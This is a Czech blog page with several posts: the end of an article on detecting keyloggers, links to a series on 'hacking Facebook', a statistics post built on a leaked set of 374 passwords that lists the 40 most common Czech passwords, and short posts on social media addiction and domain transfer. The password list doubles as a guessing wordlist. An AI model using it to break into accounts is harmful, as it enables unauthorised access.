Těžko se mi to říká, ale obrana je téměř nemožná…jediným řešením je nechodit na veřejně dostupné počítače tzn. v kavárnách, ve školách, v knihovnách apod. tam všude může číhat a být nainstalovaný takto skrytý program. Eventuálně používat tyto počítače tak, aby případně získaná data Vám nemohli nic způsobit. Ve své podstatě to znamená nepřihlašovat se do své pošty, na svůj Facebook či do internet bankovnictví jinde než z domova. Asi Vám teď v hlavě vyskočila otázka – “Nehrozí nebezpečí doma?” . Samozřejmě i tam je možné, že skrytý program se objeví, ale z 95% je jeho instalace záměrná např. jedním členem rodiny. Např. žárlivý přítel, manžel podezřívající svoji ženu z nevěry, nebo jen z důvodu, kdy rodiče hlídají činnost svých dětí na počítači. Nejbezpečnější řešením je tak mít nakonec vlastní notebook, nikomu ho nepůjčovat a mít ho dobře zaheslovaný, tak aby v případě Vaší nepřítomnosti nemohl nikdo, žádný Keylloger nainstalovat.

  • Jak zjistit  All In One Keylogger v mým počítači?

Klikněte nabídku start a do pole viz.obrázek (Prohledat programy a soubory) napište regedit,  otevřou se Vám registry windows, z horního menu vyberte Úpravy a dále pak Najít… (případně CTRL + F) do vyhledávacího pole zadejte Unkwtmjjjpqjgsp. Pokud Váš počítač obsahuje tento software, zobrazí se Vám registry obsahující toto spojení. V opačném případě tento Keylogger není ve Vašem PC.

Zpět na hlavní článek >> Jak hacknout facebook ?

Pokračovat na >> Keylogger, Kontrolní otázkaFaceNiffPhishingHack s pomocí přátel

_________________________________________________________________________________

Tento článek není návodem k páchání trestné činnosti, pouze jsem na něm ukázal, jak zranitelné jsou každodenní webové služby bez použití SSL a jak málo stačí při Vaší nepozornosti k tomu, aby jste vyzradili Vaše přístupové údaje někomu cizímu.

Nejpoužívanější hesla – pár statistik

Bře 12
2012

Zajímalo Vás někdy, jaké heslo asi tak používají kolegové z práce případně Váš/e přítel/kyně ? Není to zase tak těžké odhadnout,  většina z nás na zabezpeční příliš nedbá a svým heslem přímo vybízí k samotnému prolomení, kdejakému teen rádoby hackerovi.

Dostal se mi do rukou menší balíček hesel z jedné nejmenované stránky.  Na začátku bych rád upozornil, že při psaní tohoto článku nebyly zneužita žádná data uživatelů a hesla sloužila pouze pro statistické porovnávání jednotlivých charakteristických znaků, jako je délka hesla, zjištění náročnosti hesla, nejčastější výrazy, apod.

Celý balík se skládá celkem z 374 hesel. Ano, pravda, jedná se o poměrně malý soubor dat. Avšak i z tohoto balíku hesel, lze vypozorovat určité zvyklosti uživatelů, které ve větším množství porovnávaných dat jsou více méně neměnné.

Jako první zajímavý znak  je celková délka hesla. Dle grafu níže je vidět, že nejběžnější heslo má v průměru 6 až 8 znaků. Avšak za bezpečné heslo se považuje až heslo, které má alespoň 8 a více znaků.  Z čehož vyplývá, že téměř polovina hesel (48%) nesplňuje jednu ze zásadních podmínek bezpečného hesla.

Druhý zajímavý znak je četnost použítí kombinace čísel a písmen, případně dalších speciálních znaků. Dle zjištění je složení hesel následovné dle koláče níže.  Z čehož lze jednoduše odvodit, že pouze 29% hesel by se dalo považovat za bezpečné, neboť správné heslo obsahuje právě takovou kombinaci! ( Samozřejmě na celkovou bezpečnost má i vliv použití velkých a malých písmen v heslu. )  Avšak nenechte se mýlit, ze zmíněných 29% né všechna hesla splňují naši první podmínku délky hesla! Pokud započítáme požadavek na délku hesla, naše dvě splňující podmínky, splňuje pouze 22% všech hesel! Což není zrovna ideální stav. Pořád si myslíte, že máte bezpečné heslo?

Nyní se podíváme blíže na složení číselných hesel.Opět dle grafu níže vidíme, že nejčastěji je používané šesti-místné číselné heslo, které v drtivé většině případu je číslo 123456 případně 99999 a podobně.. tzn. jednoduché číselné řady. Následuje 8-místné číslo, které může být například datum narození či 9-místné číslo což odpovídá telefonnímu číslu. Téměř polovina číselných hesel odpovídá nějakému ze zmíněných příkladů výše.

Pokud se zaměříme na nečíselná hesla, tak dojdeme k závěru, že drtivá většina hesel je jméno nebo přezdívka ( eventuálně zdrobnělina) doplňená případně o jedno, dvě čísla. Následují názvy měst, jména hokejových(fotbalových) klubů, názvy oblíbených aut případně sprostá slova. V seznamu níže je uvedeno 40 nejpoužívanějších hesel na stránkách českého internetu – ” zdroj security-portal.cz ” . Možná na závěr bych zmínil, že speciální znaky jako tečka, lomítko či dvojtečka se v heslech objevují zcela ojediněle a u našeho vzorku 374 hesel mělo pouze 5 hesel nějaký ten znak. Možná, by nebylo špatné se zamyslet nad využítím těchto znaků pro Vaší větší bezpečnost 😉 .

123456 111111
123456789 1234
 martin  lukasek
 milacek  kacenka
 maminka  hiphop
12345  seznam
 monika  genius
0000  terezka
 veronika  michaela
 michal  kikina
 lucinka  laska
 beruska  dominika
 heslo  adelka
 nikola  eliska
 martina  natalka
 nikolka 654321
 patrik  kubicek
 sparta  rodina
 tomasek  fotbal
 dominik  pusinka

Pro zajímavost, zhruba jak dlouho trvá zjištění hesla dle délky a použitých znaků.

hesla

Chcete mít bezpečné heslo?? Doporučuji Vám přečíst můj článek – ” Bezpečnost nade vše !!

Jak jsem mazal účet na FaceBooku …

Říj 07
2011

       Dnes ráno jsem listoval novým speciálem 21.století aneb 666 Apokalyptických vizí budoucnosti:Máme důvod se bát zítřka? naleznete tam hromadu konspiračních teorií, článků jak se naše civilizace brzy zničí, kde kdo trpí apod. nechci nic z toho brát na lehkou váhu, ale musí se to číst s určitou nadsázkou. Avšak tento článek, není o vyhubení lidstva ale o malém sloupečku na jednaosmdesáté straně tohoto časopisu. Sloupeček píše o Jeff Bullas australském spisovateli a bloggerovi věnující se médiím a digitálnímu marketingu. Uveřejnil na internetu článek, který Vám řekne jak moc v sociálních sítích lítáte 🙂 . Podívejte na níže uvedené symptomy, trpíte nějakými? Pokud ano, měli by jste začít být obezřetelnější a klást si otázku, zda-li již nejste závisláci.

Změna vlastníka .CZ domény

Kvě 24
2011

Už jste někdy potřebovali převést .CZ doménu na nového majitele? Pokud ano, je dost možné, že jste se setkali s většími či menšími komplikacemi při jejím převodu. Tento krátký článek, nebo spíše návod by Vám tento postup měl usnadnit. Především pokud jste se setkali nutnosti tisknout, podepisovat, zasílat či notářsky ověřovat.


Read the rest of this entry »